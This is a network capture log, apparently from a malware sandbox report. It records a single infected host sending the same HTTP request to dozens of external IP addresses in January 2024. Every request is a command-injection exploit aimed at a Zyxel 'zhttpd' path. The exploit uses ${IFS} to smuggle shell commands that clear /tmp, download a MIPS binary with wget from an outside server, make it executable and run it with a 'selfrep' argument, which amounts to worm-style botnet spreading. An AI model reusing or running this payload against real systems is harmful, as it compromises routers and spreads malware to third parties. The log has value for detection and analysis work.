                                              Jan 29, 2024 07:03:36.755961895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1218192.168.2.1439076101.37.184.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756006002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1219192.168.2.145883497.118.90.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756028891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1220192.168.2.1438184157.37.250.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756047010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1221192.168.2.1439498156.33.64.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756071091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1222192.168.2.145580058.15.149.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756136894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1223192.168.2.1453712164.134.154.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756158113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1224192.168.2.1433454113.189.72.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756217957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1225192.168.2.145291246.157.234.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756232023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1226192.168.2.1459496219.13.24.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756283998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1227192.168.2.1434998220.98.221.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756321907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1228192.168.2.1458746119.115.26.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756344080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1229192.168.2.1459966197.110.177.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756398916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1230192.168.2.1443462144.73.211.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756438017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1231192.168.2.1456932210.175.227.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756468058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1232192.168.2.1437244202.27.198.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756516933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1233192.168.2.143458068.195.216.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756561041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1234192.168.2.1441400211.196.221.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756606102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1235192.168.2.1459538133.195.31.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756619930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1236192.168.2.144060248.55.36.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756680012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1237192.168.2.1452484145.58.183.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756711960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1238192.168.2.146086223.45.221.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.756759882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1239192.168.2.144563446.187.104.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765571117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1240192.168.2.144888093.149.138.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765598059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1241192.168.2.143456854.7.71.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765650988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1242192.168.2.1439008142.4.89.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765697956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1243192.168.2.1458986168.24.156.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765731096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1244192.168.2.1448504150.232.24.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765758038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1245192.168.2.143290676.150.60.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765777111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1246192.168.2.1439456109.60.120.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765830040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1247192.168.2.1458604138.27.76.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765852928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1248192.168.2.1436148200.127.236.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765913963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1249192.168.2.1441346195.247.162.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765954971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1250192.168.2.1439014174.235.251.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.765985012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1251192.168.2.1448730217.221.105.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766025066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1252192.168.2.143283234.168.152.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766064882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1253192.168.2.1437504135.101.92.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766117096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1254192.168.2.143748476.243.71.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766144037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1255192.168.2.143569414.125.74.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766176939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1256192.168.2.144119097.67.160.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766211987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1257192.168.2.145189299.49.237.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766247988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1258192.168.2.143913074.244.170.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766288042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1259192.168.2.143735081.12.189.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766339064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1260192.168.2.1442752110.132.105.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766380072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1261192.168.2.144320677.209.185.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766411066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1262192.168.2.14396405.89.181.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766441107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1263192.168.2.145201842.22.2.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766499043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1264192.168.2.1440090191.4.244.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766522884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1265192.168.2.143605468.23.44.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766546965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1266192.168.2.1434224202.234.216.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766582012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1267192.168.2.1457614164.4.15.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766628027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1268192.168.2.1449012147.129.81.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766649008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1269192.168.2.144462863.84.250.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766709089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1270192.168.2.145869850.223.241.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766741991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1271192.168.2.146053870.158.101.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766793013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1272192.168.2.144806092.255.6.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766817093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1273192.168.2.1432984132.188.181.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766854048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1274192.168.2.145575850.161.149.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766866922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1275192.168.2.143517491.147.186.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766944885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1276192.168.2.1451144164.199.7.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766944885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1277192.168.2.144813883.250.63.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.766973972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1278192.168.2.1444472163.194.175.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767040014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1279192.168.2.1456838212.18.151.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767056942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1280192.168.2.145167819.207.14.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.767097950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1281192.168.2.1440058177.107.112.84443
                                              TimestampBytes transferredDirectionData
